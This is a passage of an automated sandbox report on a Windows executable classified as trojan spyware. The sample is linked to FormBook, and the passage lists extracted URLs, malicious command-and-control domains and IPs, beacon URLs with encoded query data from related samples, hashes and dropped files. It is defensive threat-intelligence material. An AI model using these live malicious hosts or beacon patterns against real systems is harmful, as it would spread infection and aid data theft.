                          http://www.jiyu-kobo.co.jp/ey$ku535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.comFIyk535276_86376.exe, 00000000.00000003.399019144.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.jiyu-kobo.co.jp/o535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.392915015.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comtued535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398833639.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398767170.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398600567.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comjdd=UX4BZmexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.bisarropainting.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.techwithsun.com/bpg5/explorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.fontbureau.com/designersG535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bThe535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 00000006.00000000.446421182.00007FFA13109000.00000002.00000001.01000000.0000000A.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers9bvkr535276_86376.exe, 00000000.00000003.406068218.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/jp/Iyk535276_86376.exe, 00000000.00000003.394806717.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395306359.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395232130.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395130788.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.395028815.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394954432.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394695660.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.founder.com.cn/cnT535276_86376.exe, 00000000.00000003.391784177.0000000005546000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.391931012.0000000005546000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.391917455.0000000005546000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.tiro.com535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.antalyabfe.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comepko535276_86376.exe, 00000000.00000003.397754379.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397875370.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398059523.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398106222.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398352490.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.398267128.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.397689898.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.goodfont.co.kr535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.techwithsun.comexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.fontbureau.comd:yqk535276_86376.exe, 00000000.00000003.399987106.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399663332.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399737028.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399888854.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400101282.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.400308367.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.comiona535276_86376.exe, 00000000.00000003.406229921.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.410918897.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000002.427195369.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406106539.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406304702.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.406355997.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netD535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htm535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.com535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comR535276_86376.exe, 00000000.00000003.389229423.000000000552B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizexplorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.jiyu-kobo.co.jp/ly/kt535276_86376.exe, 00000000.00000003.394287402.0000000005524000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393320299.0000000005525000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393650795.0000000005526000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.393980369.0000000005521000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.394478695.0000000005526000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fabricadepack.funexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fonts.com535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.sandoll.co.kr535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersp535276_86376.exe, 00000000.00000003.397211203.000000000552A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sakkal.com535276_86376.exe, 00000000.00000002.427308556.0000000006622000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designerss535276_86376.exe, 00000000.00000003.399888854.000000000552A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.wearecatalyst.appexplorer.exe, 00000006.00000003.544697583.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.622952420.000000000EC60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.664770228.000000000EC55000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comsiva535276_86376.exe, 00000000.00000003.399548737.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399449469.0000000005527000.00000004.00000020.00020000.00000000.sdmp, 535276_86376.exe, 00000000.00000003.399310896.0000000005527000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        188.114.97.7
                                        		www.antalyabfe.comEuropean Union
                                        		13335CLOUDFLARENETUStrue
                                        130.185.109.77
                                        		www.berlinhealthweek.comGermany
                                        		51191XIRRADEtrue
                                        81.169.145.93
                                        		musicandgros.comGermany
                                        		6724STRATOSTRATOAGDEtrue
                                        198.177.124.57
                                        		www.gomarketing.infoUnited States
                                        		395681FINALFRONTIERVGtrue
                                        118.27.125.172
                                        		www.rt66omm.comJapan7506INTERQGMOInternetIncJPtrue
                                        183.90.228.46
                                        		www.haynicorpon.bizJapan9371SAKURA-CSAKURAInternetIncJPtrue
                                        150.129.40.9
                                        		www.jhg61.comHong Kong
                                        		132422TELECOM-HKHongKongTelecomGlobalDataCentreHKtrue

                                        General Information

                                        Joe Sandbox Version:37.1.0 Beryl
                                        Analysis ID:873585
                                        Start date and time:2023-05-23 09:37:22 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 15s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:535276_86376.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@9/2@10/7
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 72.9% (good quality ratio 66.5%)
                                        • Quality average: 71.5%
                                        • Quality standard deviation: 32.2%
                                        HCA Information:
                                        • Successful, ratio: 98%
                                        • Number of executed functions: 60
                                        • Number of non-executed functions: 164
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.42.254
                                        • Excluded domains from analysis (whitelisted): l-9999.l-msedge.net, l-ring.msedge.net, ctldl.windowsupdate.com, l-ring.l-9999.l-msedge.net, k-ring.msedge.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        09:38:28API Interceptor1x Sleep call for process: 535276_86376.exe modified
                                        09:38:55API Interceptor673x Sleep call for process: explorer.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        188.114.97.732332577.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, Stealc, VidarBrowse
                                        • potunulit.org/
                                        274722510.exeGet hashmaliciousDjvu, SmokeLoaderBrowse
                                        • potunulit.org/
                                        renderer292.exeGet hashmaliciousAmadey, Babuk, Djvu, SmokeLoader, StealcBrowse
                                        • potunulit.org/
                                        Product_List.exeGet hashmaliciousFormBookBrowse
                                        • www.antalyabfe.com/bpg5/?8mBWmPn=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&JBfKk=_uLb4J-vJhW8
                                        PS_231.exeGet hashmaliciousFormBookBrowse
                                        • www.antalyabfe.com/bpg5/?HqE8Cy=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XPyE6fdrEdOiZ3g==&kyx=IT_WJ
                                        revised_order.exeGet hashmaliciousFormBookBrowse
                                        • www.cassino-portugal.com/m82/?1b=aPUh&9rid=q5WWiyphIs/bKTrZG/AoLdDOKUkxd1ynKuyzuW8dTh3WHx0Y5kK0BjYqLcmSWI1uwK9o
                                        Docx_88635641837.200855.20104.lNk.lnkGet hashmaliciousUnknownBrowse
                                        • 0tuiw8.lookjeans.life/?1/
                                        http://097689.260mb.net/Get hashmaliciousUnknownBrowse
                                        • suspended-website.com/a/images/backgroundblue.png
                                        Remittance.htmGet hashmaliciousHTMLPhisherBrowse
                                        • bogihali.online/offnormal.php
                                        vundevjtbot.bin.exeGet hashmaliciousUnknownBrowse
                                        • www.showmyipaddress.com/
                                        file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                        • potunulit.org/
                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                        • redport80.ru/
                                        E5DpWZ7Yhr.exeGet hashmaliciousUnknownBrowse
                                        • www.showmyipaddress.com/
                                        ONOiP4wkdZ.exeGet hashmaliciousUnknownBrowse
                                        • www.showmyipaddress.com/
                                        24Hdkz2sGxG1Xq0.exeGet hashmaliciousFormBookBrowse
                                        • www.antalyabfe.com/bpg5/?67FoqNQb=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8WWgszWIXmar603w==&Bjk=Fjw7NbIMlZ8ijMXD
                                        http://bbb.ylfeee.topGet hashmaliciousUnknownBrowse
                                        • bbb.ylfeee.top/
                                        invoice.exeGet hashmaliciousFormBookBrowse
                                        • www.cassino-portugal.com/m82/?9r3t=ZTPtfb&aP=q5WWiyphIs/bKTrZG/AoLdDOKUkxd1ynKuyzuW8dTh3WHx0Y5kK0BjYqLcqrapZunMh59orRRw==
                                        Inv_7623980.exeGet hashmaliciousFormBookBrowse
                                        • www.kickskaart.com/m82/?S6IhC=Ff0tNOTzHwWilHfMGrFSofh2JwH891ZmJwBAf7EfU6QdwP+PIdI03JDY0M9rw3tYnAZb&k8qLR=JdrLURRHibKH
                                        file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                        • potunulit.org/
                                        ffm7cdrIhT.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoaderBrowse
                                        • potunulit.org/

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        k-9999.k-msedge.netUnlock932.exeGet hashmaliciousRedLineBrowse
                                        • 13.107.18.254
                                        http://morning-frost-85b6.pryforowe2341.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                        • 13.107.18.254
                                        http://metamask3.org/Get hashmaliciousHTMLPhisherBrowse
                                        • 13.107.18.254
                                        353512876.exeGet hashmaliciousRedLineBrowse
                                        • 13.107.18.254
                                        TGHQ000800000.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 13.107.18.254
                                        Invoice_#_78600667766.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                        • 13.107.18.254
                                        manager436.exeGet hashmaliciousRedLineBrowse
                                        • 13.107.18.254
                                        networking127.exeGet hashmaliciousRedLineBrowse
                                        • 13.107.18.254
                                        SV003927737627.exeGet hashmaliciousFormBookBrowse
                                        • 13.107.18.254
                                        https://pub-e0c36c831c484af1b1c7e3e8ccf4ecf1.r2.dev/tomo.htmlGet hashmaliciousHTMLPhisherBrowse
                                        • 13.107.18.254
                                        http://www.login-microsoftonline-sharefile-stgusa.inGet hashmaliciousUnknownBrowse
                                        • 13.107.18.254
                                        https://www.contractorsdocusigning.com/Get hashmaliciousUnknownBrowse
                                        • 13.107.18.254
                                        listener.exeGet hashmaliciousRedLineBrowse
                                        • 13.107.18.254
                                        launcher.exeGet hashmaliciousDjvuBrowse
                                        • 13.107.18.254
                                        http://resolve-unrecognised.com/Get hashmaliciousHTMLPhisherBrowse
                                        • 13.107.18.254
                                        pay_in_slip.docGet hashmaliciousUnknownBrowse
                                        • 13.107.18.254
                                        Fmumgl.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 13.107.18.254
                                        https://kpy3jqfcvwxayci3xs2ldn6ec3rhhboflfjzy6xke75dij7ka-ipfs-w3s-link.translate.goog/dlautomail2.html?_x_tr_hp=bafybeie4u&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp#asdfa%40kasdjfa.tGet hashmaliciousHTMLPhisherBrowse
                                        • 13.107.18.254
                                        SecuriteInfo.com.W32.Risk.PIUH-0871.21076.31589.exeGet hashmaliciousUnknownBrowse
                                        • 13.107.18.254
                                        http://www.google.com/amp/s/twincitieswebsitedesign.co%2fwp-content%2fplugins%2ftmp%2f986276%2fEriselda.Ferko@jumeirah.comGet hashmaliciousUnknownBrowse
                                        • 13.107.18.254

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUS6ft0YnCx0B.exeGet hashmaliciousAgentTeslaBrowse
                                        • 162.159.135.232
                                        https://ardordoo-my.sharepoint.com/:o:/g/personal/zeljko_sakoronja_ardor_hr/Eh4Zpd4dH19Cs-2JP7RMxqEBwkTTDQ7tSvLv58Qr5JmpAw?e=JR6ihSGet hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        LauncherPC.exeGet hashmaliciousLaplas Clipper, Vidar, XmrigBrowse
                                        • 162.159.134.233
                                        https://apiservices.krxd.net/click_tracker/track?kx_event_uid=LR25EaJr&clk=https%3A%2F%2Fdeartowear.sa.com%2Fnew%2Fauth%2Fsf_rand_string_lowercase6%2F%2F%2F%2Fam9kaWUuZmFpcmJyb3RoZXJAbWF4eGlhLmNvbS5hdQ==Get hashmaliciousUnknownBrowse
                                        • 104.18.16.182
                                        https://sites.google.com/view/elpasomotorinn/homeGet hashmaliciousHTMLPhisherBrowse
                                        • 104.18.7.145
                                        https://sites.google.com/view/elpasomotorinn/homeGet hashmaliciousHTMLPhisherBrowse
                                        • 104.18.6.145
                                        http://ww5.mangakakalot.tvGet hashmaliciousPorn ScamBrowse
                                        • 172.64.172.27
                                        file.exeGet hashmaliciousAmadey, Djvu, Fabookie, SmokeLoaderBrowse
                                        • 188.114.96.7
                                        https://ipfs.io/ipfs/QmUSV6UQrN1B4L1GXGKza7rraMRJg8ZxZKgrGVexjRYhij?filename=nmbking.html#wjusto@ashemorgan.com.auGet hashmaliciousHTMLPhisherBrowse
                                        • 188.114.96.7
                                        generator707.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, SmokeLoader, StealcBrowse
                                        • 188.114.96.7
                                        http://dnzcklizzzeeeekytxbsvr2023.net/Get hashmaliciousUnknownBrowse
                                        • 104.18.70.113
                                        Jinwtqn.exeGet hashmaliciousUnknownBrowse
                                        • 162.159.133.233
                                        http://wizardly-carson.34-88-132-120.plesk.page/Get hashmaliciousUnknownBrowse
                                        • 104.17.25.14
                                        http://morning-frost-85b6.pryforowe2341.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.25.14
                                        http://collab.pm/Get hashmaliciousUnknownBrowse
                                        • 104.16.125.175
                                        http://pi5cjdsgte6436fb4dcbf2a.wizkha.ruGet hashmaliciousUnknownBrowse
                                        • 104.18.16.182
                                        http://metamask3.org/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.17.107.199
                                        http://www.akrammurottal.net/readme.htmlGet hashmaliciousUnknownBrowse
                                        • 104.26.14.183
                                        https://pub-2417395ac027462ab16af7572078912d.r2.dev/ppo.htmGet hashmaliciousHTMLPhisherBrowse
                                        • 104.16.123.96
                                        https://onedriv-rho.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                        • 104.18.11.207

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\535276_86376.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\535276_86376.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                        C:\Users\user\AppData\Local\Temp\-15B7L5MNM

                                        Download File
                                        Process:C:\Windows\SysWOW64\systray.exe
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.287139506398081
                                        Encrypted:false
                                        SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                        MD5:292F98D765C8712910776C89ADDE2311
                                        SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                        SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                        SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.732111139006702
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:535276_86376.exe
                                        File size:648192
                                        MD5:fde32a46de11df3e8e61fea0e21eb144
                                        SHA1:c6d7194a4095ccfad4660e00bc7dd290e802b894
                                        SHA256:4690616c9b7b3d211237ffb3c8d981027e6a9894ab5a27f584828b67585a9886
                                        SHA512:790895a1169354c77abea53067230a6ebcbe3b726816a340ac84fbbbaf2397e2b4b966c290ac0047609f6164c6dc27dbb8b249858a55fb9df8cc6bf4db6d227c
                                        SSDEEP:12288:i+ntsnukHsXk+7yl1aTPvcCTduJsigw/Hn6VP0bqBddWE:yukH7zl161Eq9w/Hc0bodP
                                        TLSH:64D4F06B164F8926C47246F89265F6BD62352FE86627C32B9CE77C73F4393035C061A2
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a"ld..............0.................. ........@.. .......................@............@................................

                                        File Icon

